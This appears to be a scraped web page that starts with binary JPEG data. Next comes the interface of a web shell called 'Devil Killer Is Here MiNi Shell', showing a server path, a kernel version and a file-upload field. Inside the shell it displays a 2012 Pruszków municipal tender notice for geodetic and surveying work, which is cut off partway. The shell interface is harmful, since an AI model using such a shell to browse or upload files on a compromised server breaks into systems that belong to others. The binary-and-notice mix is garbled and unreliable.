JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121127/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121127/250311-N-2012.html

<p class="kh_header"><b>Pruszków: Opracowania geodezyjne w zakresie:
sporządzenia map ze wstępnym projektem podziału nieruchomości, map z podziałem nieruchomości, map do celów sądowych, map do celów prawnych, map do celów projektowych, wznowienia granic działki oraz regulacji stanu prawnego dróg gminnych - 8 zadań.</b><br>
<b>Numer ogłoszenia: 250311 - 2012; data zamieszczenia: 27.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Pruszków , ul. Kraszewskiego 14/16, 05-800 Pruszków, woj. mazowieckie, tel. 022 7587244.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pruszkow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowania geodezyjne w zakresie:
sporządzenia map ze wstępnym projektem podziału nieruchomości, map z podziałem nieruchomości, map do celów sądowych, map do celów prawnych, map do celów projektowych, wznowienia granic działki oraz regulacji stanu prawnego dróg gminnych - 8 zadań..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Na zamówienie składa się:
przygotowanie opracowań geodezyjnych w zakresie:

Zadanie 1 - Dotyczy obrębów: 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12 (część północna miasta Pruszkowa).
Mapy ze wstępnym projektem podziału nieruchomości - 15 szt., wraz z:
   - odbitkami w ilości 3 szt. (na sczytanej w terenie odbitce z mapy zasadniczej)
   - kopią badań hipotecznych (dział I, II, III i IV),
oraz mapy podziału nieruchomości - 15 szt., wraz z:
   - odbitkami w ilości uzgodnionej z Zamawiającym
   - kopią badań hipotecznych (wszystkie działy z podaniem numerów wniosków i podaniem podstawy wpisów),
   - kopią protokołu granicznego
   - kopią wykazu zmian gruntowych
   - stabilizacją nowych granic kołkami drewnianymi w terminie uzgodnionym z Zamawiającym

Zadanie 2 - Dotyczy obrębów: 1, 13, 14, 15, 16, 17 (część północna miasta Pruszkowa)  
Mapy ze wstępnym projektem podziału nieruchomości - 5 szt., wraz z:
   - odbitkami w ilości 3 szt. (na sczytanej w terenie odbitce z mapy zasadniczej)
   - kopią badań hipotecznych (dział I, II, III i IV)
oraz mapy z podziałem nieruchomości - 5 szt., wraz z:
   - odbitkami w ilości uzgodnionej z Zamawiającym
   - kopią badań hipotecznych (wszystkie działy z podaniem numerów wniosków i podaniem podstawy wpisów),
   - kopią protokołu granicznego
   - kopią wykazu zmian gruntowych
   - stabilizacją nowych granic kołkami drewnianymi w terminie uzgodnionym z Zamawiającym

Zadanie 3 - Dotyczy obrębów: 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28 (część południowa miasta Pruszkowa)
Mapy ze wstępnym projektem podziału nieruchomości - 5 szt., wraz z:
   - odbitkami w ilości 3 szt. (na sczytanej w terenie odbitce z mapy zasadniczej
   - kopią badań hipotecznych (dział I, II, III i IV)
oraz mapy podziału nieruchomości - 5 szt., wraz z:
   - odbitkami w ilości uzgodnionej z Zamawiającym
   - kopią badań hipotecznych (wszystkie działy z podaniem numerów wniosków i podaniem podstawy wpisów)
   - kopią protokołu granicznego
   - kopią wykazu zmian gruntowych
   - stabilizacją nowych granic kołkami drewnianymi w terminie uzgodnionym z Zamawiającym 





Zadanie 4
Mapy do celów sądowych - 8 szt. (do zasiedzenia), wraz z:
   - odbitkami w ilości uzgodnionej z Zamawiającym
   - badaniami hipotecznymi (wszystkie działy z podaniem numerów wniosków i podaniem podstawy wpisów 
      oraz nr kart w przypadku starych ksiąg lub Zbiorów Dok., na których wpisano lub załączono tytuły 
      własności)
   - kopią protokołu granicznego
   - kopią wykazu zmian gruntowych

Zadanie 5
Mapy do celów prawnych - 5 szt., wraz z:
   - odbitkami w ilości uzgodnionej z Zamawiającym
   - badaniami hipotecznymi (wszystkie działy z podaniem numerów wniosków i podaniem podstawy 
      wpisów prawa własności na rzecz Skarbu Państwa)
   - kopią protokołu granicznego
   - kopią wykazu zmian gruntowych
UWAGA: W ramach zlecenia w przypadku braku konieczności wykonania mapy do celów prawnych należy wykonać wykaz zmian wraz z zamówieniem wyrysu.

Zadanie 6
Mapy do celów projektowych - 2 szt., wraz z :
   - odbitkami w ilości uzgodnionej z Zamawiającym 

Zadanie 7
Wznowienie granic działki ze stabilizacją kołkami drewnianymi - 5 szt., wraz z:
   - szkicem wznowienia granicy
   - protokołem okazania granic

Zadanie 8
a) Mapy do celów regulacji stanu prawnego dróg gminnych (art. 73 ustawy z dnia 13 października 1998 r. 
    przepisy wprowadzające ustawy reformujące administrację publiczną Dz. U. z 1998 r., Nr 133, poz. 872 
    ze zm.)  - 8 hektometrów, wraz z:
- odbitkami w ilości uzgodnionej ze Zleceniodawcą ,
- kopią protokołu ustalenia zajęcia pod drogę publiczną na dzień 31.12.1998 r.,
- badaniami hipotecznymi (2 egz., wszystkie działy z podaniem numerów wniosków i podstawy wpisów).
Dla nieruchomości opisanych w dawnych księgach hipotecznych należy podać stronę (od - do), na której uwidoczniony jest tytuł prawny do nieruchomości.

W przypadku, gdy część działki została odłączona należy wykonać szkic historyczny nieruchomości z oznaczeniem zajętości pod drogę na dzień 31.12.1998 r.
- wykazem nieruchomości zajętych pod drogi publiczne z podaniem właścicieli i ich adresów oraz 
    dokumentów własności,
- wykazem zmian gruntowych.

b)  Mapy do celów regulacji stanu prawnego dróg gminnych (komunalizacja) - 8 hektometrów., wraz z:
- odbitkami w ilości uzgodnionej ze Zleceniodawcą,
- kopią badań hipotecznych (wszystkie działy z podaniem numerów wniosków i podaniem podstawy wpisów),
- kopią protokołu granicznego,
- kopią wykazu zmian gruntowych.

Opracowania geodezyjne muszą być wykonane zgodnie z:
a/ ustawą z dnia 21 sierpnia 1997 o gospodarce nieruchomościami (tj. Dz. U. z 2010 r. Nr 102, poz. 651 
      ze zm)
b/ ustawa z dnia 17 maja 1989 r. Prawo geodezyjne i kartograficzne (t.j. Dz. U. z 2010 r. Nr 193, poz. 1287 
      ze zm.)
c/ rozporządzeniem Ministra Rozwoju Regionalnego i Budownictwa z dnia 29 marca 2001 r. w sprawie 
     ewidencji gruntów i budynków ( Dz. U. z 2001 r. Nr 38, poz. 454)
d/ ustawa z dnia 6 lipca 1982 r. o księgach wieczystych i hipotece (tj. Dz. U. z 2001 r. Nr 124, poz. 1361 
      ze zm.)
e/ ustawą z dnia 10 maja 1990 r. Przepisy wprowadzające ustawę o samorządzie terytorialnym i ustawę 
     o pracownikach samorządowych (Dz. U. z 1990r. Nr 32, poz. 191 ze zm.)
f/ innymi przepisami obowiązującymi w tym zakresie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających o których mowa w art. 67 ust. 1 pkt. 6 Ustawy Pzp do wysokości 30% wartości zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.35.40.00-4, 71.25.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wpłaty wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający nie precyzuje w tym zakresie żadnych wymagań których spełniania Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek posiadania wiedzy i doświadczenia, będzie uznany za spełniony jeżeli Wykonawca wykaże się:

 a/  Dla zadania nr 1, 2, 3:
      wykonaniem z należytą starannością usług w okresie ostatnich 3 lat przed upływem terminu 
     składania ofert, a jeśli okres prowadzenia działalności jest krótszy w tym okresie, tj. minimum 
     8 zamówień wykonanych należycie dot. map ze wstępnym projektem podziału nieruchomości
     lub map podziału nieruchomości.
  
  b/  Dla zadania 4:
      wykonaniem z należytą starannością usług w okresie ostatnich 3 lat przed upływem terminu składania 
      ofert, a jeśli okres prowadzenia działalności jest krótszy w tym okresie, tj. minimum 8 zamówień 
      wykonanych należycie dot. map do celów sądowych (do zasiedzenia). 

  c/  Dla zadania 5:
      wykonaniem z należytą starannością usług w okresie ostatnich 3 lat przed upływem terminu składania 
      ofert, a jeśli okres prowadzenia działalności jest krótszy w tym okresie, tj. minimum 8 zamówień 
      wykonanych należycie dot. map do celów prawnych.

  d/  Dla zadania 6:
      wykonaniem z należytą starannością usług w okresie ostatnich 3 lat przed upływem terminu składania 
      ofert, a jeśli okres prowadzenia działalności jest krótszy w tym okresie, tj. minimum 8 zamówień 
      wykonanych należycie dot. map do celów projektowych.

  e/  Dla zadania 7:
      wykonaniem z należytą starannością usług w okresie ostatnich 3 lat przed upływem terminu składania 
      ofert, a jeśli okres prowadzenia działalności jest krótszy w tym okresie, tj. minimum 8 zamówień 
      wykonanych należycie dot. wznowień granic działki.

f/  Dla zadania 8:
    a)  wykonaniem z należytą starannością usług w okresie ostatnich 3 lat przed upływem terminu składania 
      ofert, a jeśli okres prowadzenia działalności jest krótszy w tym okresie, tj. minimum 4 zamówień 
      wykonanych należycie dot. map do celów regulacji stanu prawnego dróg gminnych (art. 73 


       
        ustawy z dnia 13 października 1998 r. przepisy wprowadzające ustawy reformujące administrację 
        publiczną Dz. U. z 1998 r., Nr 133, poz. 872 ze zm.),
    b)  wykonaniem z należytą starannością usług w okresie ostatnich 3 lat przed upływem terminu składania 
      ofert, a jeśli okres prowadzenia działalności jest krótszy w tym okresie, tj. minimum 4 zamówień 
      wykonanych należycie dot. map do celów regulacji stanu prawnego dróg gminnych (komunalizacja).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-  warunek dysponowania osobami zdolnymi do wykonania zamówienia będzie uznany za spełniony jeżeli
    Wykonawca wykaże się dysponowaniem osobami zdolnymi do wykonania zamówienia w tym minimum:
- 1 osobą posiadającą uprawnienia geodezyjne.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający nie precyzuje w tym zakresie żadnych wymagań których spełniania Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykaz pozostałych dokumentów składających się na ofertę
1) Formularz ofertowy (według załączonego druku) 
2) Upoważnienie/pełnomocnictwo do występowania w imieniu Wykonawcy 
UWAGA: dołączone wtedy o ile nie wynika z załączonych dokumentów 
3) Wykaz prac, które Wykonawca zamierza powierzyć podwykonawcom</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy w następujących okolicznościach tj.:
-  przedłużenia się uzgodnień zewnętrznych przez podmioty do tego upoważnione,
-  wystąpienia okoliczności nie zawinionych przez strony,  których nie można było wcześniej przewidzieć, 
      pomimo zachowania należytej staranności,
- w przypadku zmiany kluczowego personelu Wykonawcy lub Zamawiającego.
- wystąpienia obiektywnych zmian ocenianych jako korzystne dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pruszkow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> cena wersji papierowej 30,00 PLN
Urząd Miejski w Pruszkowie
ul. Kraszewskiego 14/16
Biuro Zamówień Publicznych 
pok. 113.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.12.2012 godzina 13:00, miejsce: Urząd Miejski w Pruszkowie
ul. Kraszewskiego 14/16
pok. 25.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Na zamówienie składa się:
przygotowanie opracowań geodezyjnych w zakresie:
Zadanie 1 - Dotyczy obrębów: 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12 (część północna miasta Pruszkowa).
Mapy ze wstępnym projektem podziału nieruchomości - 15 szt., wraz z:
   - odbitkami w ilości 3 szt. (na sczytanej w terenie odbitce z mapy zasadniczej)
   - kopią badań hipotecznych (dział I, II, III i IV),
oraz mapy podziału nieruchomości - 15 szt., wraz z:
   - odbitkami w ilości uzgodnionej z Zamawiającym
   - kop.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 1 - Dotyczy obrębów: 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12 (część północna miasta Pruszkowa).
Mapy ze wstępnym projektem podziału nieruchomości - 15 szt., wraz z:
   - odbitkami w ilości 3 szt. (na sczytanej w terenie odbitce z mapy zasadniczej)
   - kopią badań hipotecznych (dział I, II, III i IV),
oraz mapy podziału nieruchomości - 15 szt., wraz z:
   - odbitkami w ilości uzgodnionej z Zamawiającym
   - kopią badań hipotecznych (wszystkie działy z podaniem numerów wniosków i podaniem podstawy wpisów),
   - kopią protokołu granicznego
   - kopią wykazu zmian gruntowych
   - stabilizacją nowych granic kołkami drewnianymi w terminie uzgodnionym z Zamawiającym.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.40.00-4, 71.25.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2 - Dotyczy obrębów: 1, 13, 14, 15, 16, 17 (część północna miasta Pruszkowa)  
Mapy ze wstępnym projektem podziału nieruchomości - 5 szt., wraz z:
   - odbitkami w ilości 3 szt. (na sczytanej w terenie odbitce z mapy zasadniczej)
   - kopią badań hipotecznych (dział I, II, III i IV)
oraz mapy z podziałem nieruchomości - 5 szt., wraz z:
   - odbitkami w ilości uzgodnionej z Zamawiającym
   - kopią badań hipotecznych (wszystkie działy z podaniem numerów wniosków i podaniem podstawy w.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 2 - Dotyczy obrębów: 1, 13, 14, 15, 16, 17 (część północna miasta Pruszkowa)  
Mapy ze wstępnym projektem podziału nieruchomości - 5 szt., wraz z:
   - odbitkami w ilości 3 szt. (na sczytanej w terenie odbitce z mapy zasadniczej)
   - kopią badań hipotecznych (dział I, II, III i IV)
oraz mapy z podziałem nieruchomości - 5 szt., wraz z:
   - odbitkami w ilości uzgodnionej z Zamawiającym
   - kopią badań hipotecznych (wszystkie działy z podaniem numerów wniosków i podaniem podstawy wpisów),
   - kopią protokołu granicznego
   - kopią wykazu zmian gruntowych
   - stabilizacją nowych granic kołkami drewnianymi w terminie uzgodnionym z Zamawiającym.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.40.00-4, 71.25.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3 - Dotyczy obrębów: 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28 (część południowa miasta Pruszkowa)
Mapy ze wstępnym projektem podziału nieruchomości - 5 szt., wraz z:
   - odbitkami w ilości 3 szt. (na sczytanej w terenie odbitce z mapy zasadniczej
   - kopią badań hipotecznych (dział I, II, III i IV)
oraz mapy podziału nieruchomości - 5 szt., wraz z:
   - odbitkami w ilości uzgodnionej z Zamawiającym
   - kopią badań hipotecznych (wszystkie działy z podaniem numerów wniosków i po.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 3 - Dotyczy obrębów: 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28 (część południowa miasta Pruszkowa)
Mapy ze wstępnym projektem podziału nieruchomości - 5 szt., wraz z:
   - odbitkami w ilości 3 szt. (na sczytanej w terenie odbitce z mapy zasadniczej
   - kopią badań hipotecznych (dział I, II, III i IV)
